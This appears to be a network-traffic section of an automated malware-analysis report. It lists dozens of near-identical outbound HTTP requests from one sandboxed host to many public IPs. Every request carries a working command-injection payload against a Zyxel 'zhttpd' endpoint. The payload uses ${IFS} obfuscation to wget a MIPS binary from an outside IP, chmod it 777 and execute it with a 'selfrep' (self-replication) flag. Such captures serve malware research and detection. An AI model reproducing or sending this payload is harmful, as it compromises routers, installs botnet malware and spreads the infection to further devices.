                                                Jan 12, 2024 18:24:54.304336071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9008192.168.2.1336940198.70.207.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304390907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9009192.168.2.134036283.133.254.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304447889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9010192.168.2.1349208213.33.189.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304510117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9011192.168.2.135995048.154.219.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304589987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9012192.168.2.1334140109.119.10.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304651022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9013192.168.2.1352724173.60.131.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304692984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9014192.168.2.1338722178.146.87.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304771900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9015192.168.2.134013884.218.47.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304830074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9016192.168.2.1334798207.228.24.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304883003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9017192.168.2.1344936217.85.251.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304934978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9018192.168.2.1360710136.160.58.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304985046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9019192.168.2.134904886.89.135.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305018902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9020192.168.2.1347292120.128.62.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305071115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9021192.168.2.135424038.95.194.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305131912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9022192.168.2.1358296103.129.139.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305181980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9023192.168.2.135008672.15.56.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305224895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9024192.168.2.1336284223.132.122.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305272102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9025192.168.2.1344440221.3.240.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305344105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9026192.168.2.1336106140.159.54.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305380106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9027192.168.2.133459235.151.129.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305435896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9028192.168.2.134357094.82.167.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305490017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9029192.168.2.1346292173.55.233.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305542946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9030192.168.2.135605653.174.121.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305583000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9031192.168.2.1340260101.65.244.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305634975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9032192.168.2.1346576193.57.203.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305679083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9033192.168.2.1356054130.108.220.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305752039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9034192.168.2.1351642187.171.73.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305799007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9035192.168.2.1353998221.87.250.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305865049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9036192.168.2.136037667.218.97.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305918932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9037192.168.2.1334424180.35.56.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.305948019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9038192.168.2.134002691.26.123.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306014061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9039192.168.2.133791899.224.178.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306088924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9040192.168.2.1334942177.228.125.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306144953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9041192.168.2.1352342166.246.191.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306179047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9042192.168.2.1348168193.58.40.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306252956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9043192.168.2.1348854183.68.4.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306302071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9044192.168.2.1334446140.168.42.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306339979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9045192.168.2.1344800176.229.227.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306397915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9046192.168.2.134357658.147.227.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306452990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9047192.168.2.1348418198.104.33.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306493998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9048192.168.2.134732427.67.52.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306530952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9049192.168.2.135625686.253.107.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306602955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9050192.168.2.1355186210.175.213.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306654930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9051192.168.2.133961637.203.115.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306718111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9052192.168.2.1346646183.86.7.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306776047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9053192.168.2.1340838139.78.203.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306824923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9054192.168.2.1354596151.134.233.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306873083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9055192.168.2.133930049.115.178.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306901932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9056192.168.2.1351472134.75.174.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.306956053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9057192.168.2.1344600103.2.119.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307002068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9058192.168.2.1342780166.231.146.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307065010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9059192.168.2.1344406220.49.46.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307130098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9060192.168.2.1345520169.162.249.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307178974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9061192.168.2.135520279.147.160.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307245016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9062192.168.2.13357125.178.255.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307286978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9063192.168.2.1360504145.194.163.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307364941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9064192.168.2.1353860191.51.191.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307400942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9065192.168.2.135110876.66.217.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307445049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9066192.168.2.134199097.58.80.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307488918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9067192.168.2.1341554203.77.222.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307533026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9068192.168.2.136004245.3.245.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307596922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9069192.168.2.134339645.46.29.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307653904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9070192.168.2.1353258187.15.102.133443
                                                TimestampBytes transferredDirectionData
